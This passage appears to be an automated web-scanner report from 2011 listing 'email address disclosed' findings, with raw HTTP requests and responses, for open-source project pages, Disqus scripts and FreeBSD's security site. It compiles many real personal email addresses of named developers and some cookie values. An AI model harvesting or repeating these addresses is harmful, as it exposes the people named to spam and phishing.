X-Proxy: 1
Content-Length: 14599

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<a href="mailto:contact@appendto.com">contact@appendTo.com</a>
...[SNIP]...
<a href="mailto:hello@filamentgroup.com">hello@filamentgroup.com</a>
...[SNIP]...

24.83. http://kickapps.yuku.com/service/searchEverythingAsRss.kickAction previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://kickapps.yuku.com
Path:	/service/searchEverythingAsRss.kickAction

Issue detail

The following email address was disclosed in the response:

boards@parenthood.com

Request

Response

24.84. http://klibido.sourceforge.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://klibido.sourceforge.net
Path:	/

Issue detail

The following email address was disclosed in the response:

bauno@inwind.it

Request

GET / HTTP/1.1
Host: klibido.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 22:38:54 GMT
Content-Type: text/html
Connection: close
Last-Modified: Sat, 04 Mar 2006 09:48:38 GMT
ETag: "7c92-40e2832a50980"
Accept-Ranges: bytes
Content-Length: 31890
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:38:54 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<h
...[SNIP]...
<a href="mailto:bauno@inwind.it?subject=KLibido%20development">
...[SNIP]...

24.85. http://mako.cc/projects/aub/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mako.cc
Path:	/projects/aub/

Issue detail

The following email addresses were disclosed in the response:

avinash@acm.org
blong@fiction.net
mako@atdot.cc
mako@debian.org

Request

GET /projects/aub/ HTTP/1.1
Host: mako.cc
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:49:39 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/4.4.4-8+etch6
Last-Modified: Sat, 09 May 2009 23:28:20 GMT
ETag: "64496-1a72-4698319b88d00"
Accept-Ranges: bytes
Content-Length: 6770
Content-Type: text/html

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xml:lang="en" lang="en">
<h
...[SNIP]...
<a href="mailto:blong@fiction.net"><blong@fiction.net></a>
...[SNIP]...
<a href="mailto:avinash@acm.org"><avinash@acm.org></a>
...[SNIP]...
<a href="mailto:mako@debian.org"><mako@debian.org></a>
...[SNIP]...
<a href="mailto:mako@debian.org">Benjamin Mako Hill <mako@atdot.cc></a>
...[SNIP]...

24.86. http://mako.cc/projects/aub/ChangeLog previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mako.cc
Path:	/projects/aub/ChangeLog

Issue detail

The following email addresses were disclosed in the response:

cls@seawood.org
dirk@computer42.org

Request

GET /projects/aub/ChangeLog HTTP/1.1
Host: mako.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:35:15 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/4.4.4-8+etch6
Last-Modified: Sat, 09 May 2009 23:28:20 GMT
ETag: "6447f-10f3-4698319b88d00"
Accept-Ranges: bytes
Content-Length: 4339
Connection: close
Content-Type: text/plain

2005-09-11 19:19 mako

   * aub: Finally packaged up all of the changes and made the new
   release. Better late than never.

2003-10-10 19:45 mako

   * aub: Lots of changes. Christopher Seawood <cls@seawood.org>
   contributed yEnc support, fixed some HOOK problems and submitted
   some fixes for AUTH issues as well as a line to make things work
   better on non-Linux platforms.

   dirk@computer42.org contributed a patch to make AUB set mode reader
   which fixes some NNTP access issues.

2002-06-02 14:42 mako

   * debian/changelog: Updated Debian information in preperation for a
   new release fixing
...[SNIP]...

24.87. http://mako.cc/projects/aub/docs/Introducing_AUB previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mako.cc
Path:	/projects/aub/docs/Introducing_AUB

Issue detail

The following email addresses were disclosed in the response:

avinash@acm.org
blong@fiction.net
mako@debian.org
stantz@sgi.com

Request

GET /projects/aub/docs/Introducing_AUB HTTP/1.1
Host: mako.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:35:32 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/4.4.4-8+etch6
Last-Modified: Sat, 09 May 2009 23:28:20 GMT
ETag: "64480-6807-4698319b88d00"
Accept-Ranges: bytes
Content-Length: 26631
Connection: close
Content-Type: text/plain

           The Introducing AUB Document

   1.    What is aub?

   More and more people are posting binary files to usenet these days.
Some of these binaries are executables and audio data; a majority seem to
be p
...[SNIP]...
<stantz@sgi.com>
...[SNIP]...
<blong@fiction.net>
...[SNIP]...
<mako@debian.org>
...[SNIP]...
<avinash@acm.org>
...[SNIP]...

24.88. http://mako.cc/projects/aub/docs/aub.1.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mako.cc
Path:	/projects/aub/docs/aub.1.html

Issue detail

The following email addresses were disclosed in the response:

avinash@acm.org
blong@fiction.net
mako@debian.org

Request

GET /projects/aub/docs/aub.1.html HTTP/1.1
Host: mako.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:35:36 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/4.4.4-8+etch6
Last-Modified: Sat, 09 May 2009 23:28:20 GMT
ETag: "64486-1372-4698319b88d00"
Accept-Ranges: bytes
Content-Length: 4978
Connection: close
Content-Type: text/html

<HTML
><HEAD
><TITLE
>aub</TITLE
><META
NAME="GENERATOR"
CONTENT="Modular DocBook HTML Stylesheet Version 1.76b+
"></HEAD
><BODY
CLASS="REFENTRY"
><H1
><A
NAME="AEN1">aub</H1
><DIV
CLASS="REFNAMEDIV"

...[SNIP]...
<A
HREF="mailto:blong@fiction.net"
>blong@fiction.net</A
>
...[SNIP]...
<A
HREF="mailto:avinash@acm.org"
>avinash@acm.org</A
>
...[SNIP]...
<A
HREF="mailto:mako@debian.org"
>mako@debian.org</A
>
...[SNIP]...

24.89. http://mako.cc/projects/aub/docs/aubconf.1.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mako.cc
Path:	/projects/aub/docs/aubconf.1.html

Issue detail

The following email addresses were disclosed in the response:

avinash@acm.org
blong@fiction.net
mako@debian.org

Request

GET /projects/aub/docs/aubconf.1.html HTTP/1.1
Host: mako.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:35:40 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/4.4.4-8+etch6
Last-Modified: Sat, 09 May 2009 23:28:20 GMT
ETag: "64487-2dbc-4698319b88d00"
Accept-Ranges: bytes
Content-Length: 11708
Connection: close
Content-Type: text/html

<HTML
><HEAD
><TITLE
>aubconf</TITLE
><META
NAME="GENERATOR"
CONTENT="Modular DocBook HTML Stylesheet Version 1.76b+
"></HEAD
><BODY
CLASS="REFENTRY"
><H1
><A
NAME="AEN1">aubconf</H1
><DIV
CLASS="REFN
...[SNIP]...
<A
HREF="mailto:blong@fiction.net"
>blong@fiction.net</A
>
...[SNIP]...
<A
HREF="mailto:avinash@acm.org"
>avinash@acm.org</A
>
...[SNIP]...
<A
HREF="mailto:mako@debian.org"
>mako@debian.org</A
>
...[SNIP]...

24.90. http://mako.cc/projects/aub/download/aub_2.2.tar.gz previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mako.cc
Path:	/projects/aub/download/aub_2.2.tar.gz

Issue detail

The following email addresses were disclosed in the response:

avinash@acm.org
blong@fiction.net
cls@seawood.org
dirk@computer42.org
geddes@debian.org
jkominek@debian.org
jkominek@xtn.net
mako@debian.org
rhertzog@hrnet.fr

Request

GET /projects/aub/download/aub_2.2.tar.gz HTTP/1.1
Host: mako.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:35:25 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/4.4.4-8+etch6
Last-Modified: Sat, 09 May 2009 23:28:20 GMT
ETag: "64490-ade3-4698319b88d00"
Accept-Ranges: bytes
Connection: close
Content-Type: application/x-gzip
Content-Length: 163840

aub-2.2/............................................................................................0000755.0001750.0001750.00000000000.10311134735.010562. 5...........................................
...[SNIP]...
<cls@seawood.org>
   contributed yEnc support, fixed some HOOK problems and submitted
   some fixes for AUTH issues as well as a line to make things work
   better on non-Linux platforms.

   dirk@computer42.org contributed a patch to make AUB set mode reader
   which fixes some NNTP access issues.

2002-06-02 14:42 mako

   * debian/changelog: Updated Debian information in preperation for a
   new release fixing
...[SNIP]...
<mako@debian.org>
...[SNIP]...
.0 8/92.     Major rewrite, numerous enhancements, speed hacks.
        Now requires a formal configuration file.
v2.0.5 2/97 HP-UX version with various fixes
v2.0.6 6/97 blong@fiction.net
added @kill_subj, a list of regex used for a
simple killfiling based on subjects. Hardcoded,
default is to kill articles with m
...[SNIP]...
also, removed dependency on sys/socket.ph, just
defined the values in this file
updated for perl5 as well
v2.0.7 2/98 blong@fiction.net
don't grab articles one at a time if using XHDR,
ask for them all (especially useful now with the
high number of canceled spam in the binary
groups)
v2.0.8 5/98 blong@fiction.net
Fixed bug in handling of unresolved articles,
forgot to fix a function call from the XHDR
improvement
v2.0.9 5/98 blong@fiction.net
now handles some MIME/Base64 articles
also, handles articles that only specify a hint
in the subject, and no piece information
v2.0.10 10/98 blong@fiction.net
Attempts to use authinfo for NNTP authorization
v2.0.11 11/01 avinash@acm.org
(v2.1) See below.

----------------------------------------------------------------------
v2.1 -- Nov01 avinash:
-- Removed most ` ` system() commands - major reduction in CPU load

...[SNIP]...
-------------------------------------------------
aub - Assemble Usenet Binaries

Original Author:
Mark Stantz        [1992] [Nov2001: no valid email addresses known]

Updates:
2.0.5 to 2.0.10    [1998] blong@fiction.net    Brandon Long
2.1            [2001] avinash@acm.org        Avinash Chopde
2.1.1+ [2002] mako@debian.org Mako Hill
----------------------------------------------------------------------------

REQUIREMENTS
------------------------

* >
...[SNIP]...
onf's manpage (in man, html, and source DocBook sgml format)

----------------------------------------------------------------------------
AUB HOME: http://yukidoke.org/~mako/projects/aub/

Mako Hill
mako@debian.org
http://people.debian.org/~mako/

.......................................................................................................................................................................
...[SNIP]...
............................#!/usr/bin/perl
#
# aub: assemble usenet binaries
#
# Original Author:
# Mark Stantz        [1992] [Nov01: no valid email addresses known]
#
# Updates:
# 2.0.5 to 2.0.10    [1998] blong@fiction.net    Brandon Long
# 2.1            [2001] avinash@acm.org        Avinash Chopde
# 2.1.1 and beyond
# [2002] mako@debian.org Mako Hill
#
# This code is offered as-is. Anyone is welcome to make improvements,
# provided that my notice of authorship is retained. I accept no
# responsibility for loss or damage caused
...[SNIP]...
<mako@debian.org>
...[SNIP]...
<email>mako@debian.org</email>
...[SNIP]...
<email>blong@fiction.net</email>
...[SNIP]...
<email>avinash@acm.org</email>
...[SNIP]...
<email>mako@debian.org</email>
...[SNIP]...
<mako@debian.org>
...[SNIP]...
<email>mako@debian.org</email>
...[SNIP]...
<email>blong@fiction.net</email>
...[SNIP]...
<email>avinash@acm.org</email>
...[SNIP]...
<email>mako@debian.org</email>
...[SNIP]...
<mako@debian.org>
...[SNIP]...
<mako@debian.org>
...[SNIP]...
<mako@debian.org>
...[SNIP]...
<mako@debian.org>
...[SNIP]...
<mako@debian.org>
...[SNIP]...
<mako@debian.org>
...[SNIP]...
<mako@debian.org>
...[SNIP]...
<rhertzog@hrnet.fr>
...[SNIP]...
<geddes@debian.org>
...[SNIP]...
<jkominek@debian.org>
...[SNIP]...
<jkominek@xtn.net>
...[SNIP]...
<mako@debian.org>
...[SNIP]...
<mako@debian.org>
...[SNIP]...

24.91. http://mediacdn.disqus.com/1295633860/build/system/disqus.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1295633860/build/system/disqus.js

Issue detail

The following email addresses were disclosed in the response:

anton@disqus.com
oyvind@kinsey.no

Request

GET /1295633860/build/system/disqus.js? HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www1.whdh.com/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-473502224-1295482487215

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 21:55:22 GMT
Expires: Wed, 23 Feb 2011 21:55:22 GMT
Server: Apache/2.2.14 (Ubuntu)
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Vary: Accept-Encoding
X-Cache-Lookup: HIT from media.disqus.com:3128
Content-Type: application/javascript
Last-Modified: Fri, 21 Jan 2011 18:30:56 GMT
X-Origin-Date: Fri, 21 Jan 2011 18:33:59 GMT
X-Origin-Expires: Sun, 20 Feb 2011 18:33:59 GMT
X-Cache-Age: 12703
X-Cache: HIT from cdce-nym011-013.nym011.internap.com
X-Origin-Date: Mon, 24 Jan 2011 14:08:09 GMT
X-Origin-Expires: Sun, 20 Feb 2011 22:05:42 GMT
X-Cache-Age: 28033
X-Cache: HIT from cdce-nym011-013.nym011.internap.com
Via: 1.0 cdce-nym011-013.nym011.internap.com:1082 (squid/2.7.STABLE7), 1.0 cdce-nym011-013.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive
Content-Length: 166572

var DISQUS;if(typeof DISQUS=="undefined"){throw"Can't find DISQUS"}DISQUS.dtpl=(function(){var a={version:"0.2",author:"Anton Kovalyov <anton@disqus.com>"};a.getGuestFields=function(f){function e(g){r
...[SNIP]...
tListener)}};documentListener=c.events.add(document,"click",f)};c.Tooltip=d;c.ManualTooltip=a})(DISQUS);DISQUS.modules.tooltip=true;
/*
* The MIT License
*
* Copyright (c) 2009 ..yvind Sean Kinsey, oyvind@kinsey.no
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restricti
...[SNIP]...

24.92. http://mediacdn.disqus.com/1295633860/js/dist/lib.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mediacdn.disqus.com
Path:	/1295633860/js/dist/lib.js

Issue detail

The following email address was disclosed in the response:

oyvind@kinsey.no

Request

GET /1295633860/js/dist/lib.js HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://7newsboston.disqus.com/thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/reply.html?f=7newsboston&t=whdh_tv_commuter_rail_service_updates_for_jan_24_22&ff=Helvetica%20Neue%2C%20Helvetica%2C%20arial&p=Type%20your%20comment%20here.&ifrs=&1295906169624&xdm_e=http%3A%2F%2Fwww1.whdh.com&xdm_c=default6500&xdm_p=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-473502224-1295482487215

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 21:55:33 GMT
Expires: Wed, 23 Feb 2011 21:55:33 GMT
Server: Apache/2.2.14 (Ubuntu)
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Vary: Accept-Encoding
X-Cache-Lookup: HIT from chafe.disqus.net:3128
Content-Type: application/javascript
Last-Modified: Fri, 21 Jan 2011 18:30:51 GMT
X-Origin-Date: Fri, 21 Jan 2011 18:33:54 GMT
X-Origin-Expires: Sun, 20 Feb 2011 18:33:54 GMT
X-Cache-Age: 20181
X-Cache: HIT from cdce-nym011-012.nym011.internap.com
X-Origin-Date: Mon, 24 Jan 2011 17:56:03 GMT
X-Origin-Expires: Mon, 21 Feb 2011 00:10:15 GMT
X-Cache-Age: 14370
X-Cache: HIT from cdce-nym011-012.nym011.internap.com
Via: 1.0 cdce-nym011-012.nym011.internap.com:1082 (squid/2.7.STABLE7), 1.0 cdce-nym011-012.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: keep-alive
Content-Length: 104980

/*
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Sizz
...[SNIP]...
<e.length;j++){k.removeAttribute(e[j].name)}k.save(d)}}}}}catch(f){}return c})()});
/*
* The MIT License
*
* Copyright (c) 2009 ..yvind Sean Kinsey, oyvind@kinsey.no
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restricti
...[SNIP]...

24.93. http://mozex.mozdev.org/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mozex.mozdev.org
Path:	/index.html

Issue detail

The following email address was disclosed in the response:

vlmarek@volny.cz

Request

GET /index.html HTTP/1.1
Host: mozex.mozdev.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 24 Jan 2011 22:42:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.12
Content-Length: 9384

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<title>mozdev.org - mozex: index</title>
<link href="//www.mozdev.org/skin/winter
...[SNIP]...
<a href="mailto:vlmarek@volny.cz">vlmarek@volny.cz</a>
...[SNIP]...

24.94. http://multisuck.sourceforge.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://multisuck.sourceforge.net
Path:	/

Issue detail

The following email address was disclosed in the response:

conrads@cox.net

Request

GET / HTTP/1.1
Host: multisuck.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 22:43:00 GMT
Content-Type: text/html
Connection: close
Last-Modified: Thu, 06 Jun 2002 18:10:26 GMT
ETag: "6a7-3a2c3dc270880"
Accept-Ranges: bytes
Content-Length: 1703
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:43:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Multisuck</title>

...[SNIP]...
<a href="mailto:conrads@cox.net">
...[SNIP]...

24.95. http://news.cnet.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://news.cnet.com
Path:	/

Issue detail

The following email address was disclosed in the response:

tips-ne@cnet.com

Request

GET / HTTP/1.1
Host: news.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

24.96. http://newspost.unixcab.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newspost.unixcab.org
Path:	/

Issue detail

The following email address was disclosed in the response:

newspost@sdf.lonestar.org

Request

GET / HTTP/1.1
Host: newspost.unixcab.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:45:56 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e DAV/2
Last-Modified: Sat, 10 May 2003 19:24:37 GMT
ETag: "39f748-2fd3-3bd544bd5f2f0"
Accept-Ranges: bytes
Content-Length: 12243
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Newspost - a usenet binary autoposter for unix</title>

...[SNIP]...
<a href="mailto:newspost@sdf.lonestar.org">
...[SNIP]...
<a href="mailto:newspost@sdf.lonestar.org">newspost@sdf.lonestar.org</a>
...[SNIP]...

24.97. http://newsstar.sourceforge.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://newsstar.sourceforge.net
Path:	/

Issue detail

The following email address was disclosed in the response:

h@realh.co.uk

Request

GET / HTTP/1.1
Host: newsstar.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 22:46:02 GMT
Content-Type: text/html
Connection: close
Last-Modified: Thu, 02 Oct 2008 18:00:49 GMT
ETag: "1aa1-45848ff2ef6c5"
Accept-Ranges: bytes
Content-Length: 6817
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:46:01 GMT

<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Newsstar</title><meta name="generator" content="DocBook XSL Stylesheets V1.73.2"><link rel="start" href="index.htm
...[SNIP]...
<a class="email" href="mailto:h@realh.co.uk">h@realh.co.uk</a>
...[SNIP]...

24.98. http://noffle.sourceforge.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://noffle.sourceforge.net
Path:	/

Issue detail

The following email addresses were disclosed in the response:

martin@godisch.de
paul@wurtel.demon.nl

Request

GET / HTTP/1.1
Host: noffle.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 22:46:11 GMT
Content-Type: text/html
Connection: close
Last-Modified: Fri, 28 Feb 2003 22:53:45 GMT
ETag: "1525-3b7c2f1005040"
Accept-Ranges: bytes
Content-Length: 5413
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:46:11 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Noffle</title>
<META HTTP-EQUIV="content-type" CONTENT="text/html; charset=iso-8859-1">
<META NAME="description" C
...[SNIP]...
<a href="mailto:paul@wurtel.demon.nl">
...[SNIP]...
<a href="mailto:martin@godisch.de">
...[SNIP]...

24.99. http://noisybox.net/computers/nzbperl/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://noisybox.net
Path:	/computers/nzbperl/

Issue detail

The following email addresses were disclosed in the response:

beheerder@gmail.com
jason@noisybox.net
nzbperl-subscribe@googlegroups.com
nzbperl-unsubscribe@googlegroups.com

Request

GET /computers/nzbperl/ HTTP/1.1
Host: noisybox.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:45:53 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 35630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
   <link rel="icon" href="/images/favicon.ico" type="image/x-icon"/>
   <link re
...[SNIP]...
<a href="mailto:jason@noisybox.net">
...[SNIP]...
<a href="mailto:nzbperl-subscribe@googlegroups.com">nzbperl-subscribe@googlegroups.com</a>
...[SNIP]...
<a href="mailto:jason@noisybox.net">
...[SNIP]...
<li>
   Add option (--badNZB or similar) that can call a script when a "bad" NZB is hit (see
   google groups thread from beheerder@gmail.com).
   </li>
...[SNIP]...
<a href="mailto:nzbperl-subscribe@googlegroups.com">nzbperl-subscribe@googlegroups.com</a>
...[SNIP]...
<a href="mailto:nzbperl-unsubscribe@googlegroups.com">nzbperl-unsubscribe@googlegroups.com</a>
...[SNIP]...
<a href="mailto:jason@noisybox.net">
...[SNIP]...
<a href="mailto:jason@noisybox.net">
...[SNIP]...

24.100. http://offog.org/code/rawdog.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://offog.org
Path:	/code/rawdog.html

Issue detail

The following email address was disclosed in the response:

ats@offog.org

Request

GET /code/rawdog.html HTTP/1.1
Host: offog.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:46:43 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Mon, 03 Jan 2011 13:29:28 GMT
ETag: "3efdb-3473-498f124283e00"
Accept-Ranges: bytes
Content-Length: 13427
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<
...[SNIP]...
<a href="mailto:ats@offog.org" accesskey="9"><code>ats@offog.org</code>
...[SNIP]...

24.101. http://people.joomla.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://people.joomla.org
Path:	/

Issue detail

The following email address was disclosed in the response:

info@emc23.com

Request

GET / HTTP/1.1
Host: people.joomla.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:47:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 33e27d3d0725f34a77c307be63476b5b=df72bb7ce303a3507e4fbb9caac60af7; path=/
Set-Cookie: currentURI=http%3A%2F%2Fpeople.joomla.org%2F; expires=Tue, 25-Jan-2011 22:47:57 GMT; path=/
Last-Modified: Mon, 24 Jan 2011 22:47:57 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 104112

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
elease Party Jan 27th::Dublin JOOMLA 1.6 Release Party.
Longstone Pub Jan 27th Townsend Street. Upstairs 18:00-20:00 pm
Beer and Joomla!Cake

..
For more info contact Joomla Users group Dublin at info@emc23.com
..">
...[SNIP]...

24.102. http://security.freebsd.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://security.freebsd.org
Path:	/

Issue detail

The following email addresses were disclosed in the response:

FreeBSD-announce@FreeBSD.org
FreeBSD-security-notifications@FreeBSD.org
FreeBSD-security@FreeBSD.org
cperciva@FreeBSD.org
rwatson@FreeBSD.org
secteam@FreeBSD.org
security-officer@FreeBSD.org
simon@FreeBSD.org

Request

GET / HTTP/1.1
Host: security.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 12:33:23 GMT
Server: Apache
Last-Modified: Sat, 15 Jan 2011 12:35:15 GMT
ETag: "290a48-4f67-c85be6c0"
Accept-Ranges: bytes
Content-Length: 20327
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="generator"
...[SNIP]...
<a
href="mailto:secteam@FreeBSD.org">
...[SNIP]...
<a
href="mailto:security-officer@FreeBSD.org">
...[SNIP]...
<a
href="mailto:security-officer@FreeBSD.org"><security-officer@FreeBSD.org></a>
...[SNIP]...
<a
href="mailto:cperciva@FreeBSD.org"><cperciva@FreeBSD.org></a>
...[SNIP]...
<a
